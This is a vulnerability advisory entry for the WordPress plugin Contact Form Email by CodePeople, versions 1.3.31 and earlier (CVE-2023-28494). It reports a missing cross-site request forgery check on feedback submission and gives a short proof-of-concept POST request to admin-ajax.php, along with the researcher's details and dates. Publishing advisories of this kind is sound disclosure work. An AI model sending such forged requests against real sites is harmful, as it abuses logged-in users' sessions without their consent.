Contact Form Email by CodePeople

Contact Form Email by CodePeople <= 1.3.31 - CSRF

LANACOMMONVDB ID: f402b79b-f756-42bd-a798-dd4bd86cfc77

The plugin does not have Cross-Site Request Forgery (CSRF) check when submitting feedback, which could allow attackers to make logged in users do such action on their behalf via a Cross-Site Request Forgery (CSRF) attack.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=cpcfte_feedback&answer=Something&onymous=false

References

Source Code: https://wordpress.org/plugins/contact-form-to-email/

CVE: CVE-2023-28494

Attributes

Catgory: WordPress Plugin

Discovered: 2022-10-14

Published: 2023-03-16

Affected Version: <= 1.3.31

Classification

Type: Cross-Site Request Forgery (CSRF)

Researcher

Name: István Márton

Email: [email protected]